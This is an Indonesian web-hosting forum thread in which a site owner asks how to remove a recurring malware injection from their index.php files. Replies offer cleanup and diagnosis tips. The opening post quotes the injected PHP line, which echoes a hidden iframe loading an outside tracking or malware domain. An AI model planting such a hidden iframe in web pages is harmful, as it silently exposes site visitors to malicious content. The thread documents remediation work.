Tolong pilih kategori sesuai, jenis posting (diskusi atau bukan) dan sertakan tag/topik yang sesuai seperti komputer, java, php, mysql, dll. Promosi atau posting tidak pada tempatnya akan kami hapus!
- Bagi Anda yang ingin mendaftar, baca link berikut:
http://diskusiweb.com/discussion/50491/how-to-registrasi-diskusiweb-com-baca-ini-terlebih-dahulu
- Cara menyisipkan kode program supaya tampil rapi dan terformat dengan baik di diskusiweb.com: http://www.diskusiweb.com/discussion/50415/cara-menyisipkan-kode-program-di-diskusiweb-com
- Cara posting gambar/image di post Anda: http://www.diskusiweb.com/discussion/47345/cara-menyisipkan-menyertakan-image-pada-posting/p1

File index.php saya kena Malware di MWN. Bgmn Solusinya???

File index.php saya kena Malware di MWN


saya juga punya masalah yg sama dengan htaccess di MWN, persis dengan yang rekan2 alami.

untuk htaccess sy udah contact CS nya. dan terselesaikan oleh mereka.

ketika sy buat baru lagi harus contact mereka lagi (MWN yang aneh)

nah sekerang kasus yg saya alami adalah, semua file index.php yang ada di hostingan sy semua nya muncul tulisan/tag :

echo "<iframe src=\"http://internetcountercheck.com/?click=18998015%5c%5c%5c" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

rekan2 tau solusi nya bagaimana?
sy sudah coba upload ulang(menghilangkan semua tag itu), keesokan harinya, muncul lagi. sy hapus lagi. trus tiba2 muncul lagi.

padahal di komputer local saya, tidak ada script itu.
mohon informasi nya.
terima kasih

Comments

  • minta di antivirus dari server hosting ajah kali ya...
  • ada virus di server hostingnya, semacam trojan
    kalo disediakan antivirus, di scan saja dulu
    AddEmoticons0055.gif
  • Pertanyaan sudah saya teruskan ke pihak terkait, yaitu MWN.

    Jawabannya sebagai berikut:

    biasanya sih yang begini terjadi karena ada malware di komputer KLIEN-nya (yang ngupload file tersebut, mis dengan program ftp).

    cara membuktikannya apakah dari server atau klien, coba buat filenya lewat control panel web spanel. dari Kelola File klik Buat File Baru lalu buat file php mis:

    <?php phpinfo(); ?>

    lalu save sebagai 1.php.

    akses 1.php ini dari browser.

    cek lagi dari control panel spanel (view/edit), apakah muncul iframe tersebut.

    jika muncul, berarti kemungkinan virus ada di server. jika tidak muncul, kemungkinan virus ada di klien yang menginjeksikannya sebelum file diupload ke server.
  • oh iya satu lagi:

    Setelah dihapus lalu di save file, coba cek kembali halaman front end blog. Jika script iFrame-nya masih ada, berarti ada satu file lagi yang diinject script iFrame : index.php yang berada di direktori public_html.

    Masuk ke direktori public_html lalu pilih edit file.

    File index.php akan terbuka dengan code editor default . Bandingkan dengan file index.php wordpress versi sama yang benar .

    Hapus script yang berbeda, lalu close editor code dan upload lagi file index.php tersebut ke direktori public_html server anda.
  • Cara menangani iframe injection: Hapus saja script yang bertugas memanggil dokumen iFrame.

    Masalahnya : file mana yang disisipi script iFrame ini?

    yang paling sederhana adalah file index.php theme yang sedang digunakan. Coba cek. file index.php theme yang sedang aktif via DESIGN > THEME EDITOR . Biasanya ada di bagian paling bawah file, berupa tag php yang melakukan echo :
  • ak pernah ngalamin hal serupa, selalu kena inject js aneh,
    pas kutanya ke tech supp, katanya komp client kena virus,
    padahal ak upload ga cuman di 1 tempat, pindah2 warnet,
    warnet pilihanku pun selalu yang memakai deepfreeze,
    tp script yg terinjeksi selalu identik,
    lumayan lama itu, ak tiap hari ngebersihin,
    tapi setelah sebulan lebih tiba2 ga muncul lagi,
    ak jg ga pernah pindah dari warnet2 favoritku,
    jadi akhirnya ak ambil kesimpulan:
    pihak hostingnya ga mau kredibilitas mereka turun dengan mengaku ada virus/semacamnya d server mereka...
  • @^ apaan sih.... bawa-bawa keluarga super momod... ndompleng kata orang jawa bilang sih :(
  • maksud loh....... cuakep cuakep cuakep tapi bawel...
  • @allysha taunya cuma wordpress maksudnya.....
  • *kucek-kucek mata liat opsel*
    sindiran om admin ternyata berguna :D
    //kabor
  • ikutin aja saran opsel diatas..

    semoga berguna


    iya nich.... dikit2 pengen saling membantu para dwebber
  • @^
    taunya cuma wordpress :P:P:P
  • @^ nah gitu dong opsel

    kan jadi seneng ngeliatnya.....
    bagi2 apa yang lo ketahui dan blum kita ketahui lah...
    ngamal....ngamal.....(eh jadi OOT neh)
  • saya udah coba tips dari : michael.ea (Moderator).
    sy cek di file 1.php nya tidak ada. sy cek juga di komputer lokal saya juga tidak ada.
    komputer sy sudah saya scan dan tidak ada virus.

    tapi si malware itu tetap ada.
    rekan2 lain bisa kasi saya solusi. terima kasih
  • Originally posted by lilis
    saya udah coba tips dari : michael.ea (Moderator).
    sy cek di file 1.php nya tidak ada. sy cek juga di komputer lokal saya juga tidak ada.
    komputer sy sudah saya scan dan tidak ada virus.

    tapi si malware itu tetap ada.
    rekan2 lain bisa kasi saya solusi. terima kasih

    brarti virus ada di hosting server ?
    bukan dari klien ?
  • Setelah Anda buat 1.php dari sPanel langsung, apakah baris trojan tersebut muncul di file 1.php. Bila tidak, berarti masalahnya bukan di server.

    Kalo solusi saya sih: kirim tiket ke supportnya MWN.

    atau

    eksperimen aja, file index.phpnya jangan dihapus. Kemudian masuk sPanel dan edit file tersebut dengan menghapus baris script trojan tadi kemudian baru disave.
Sign In or Register to comment.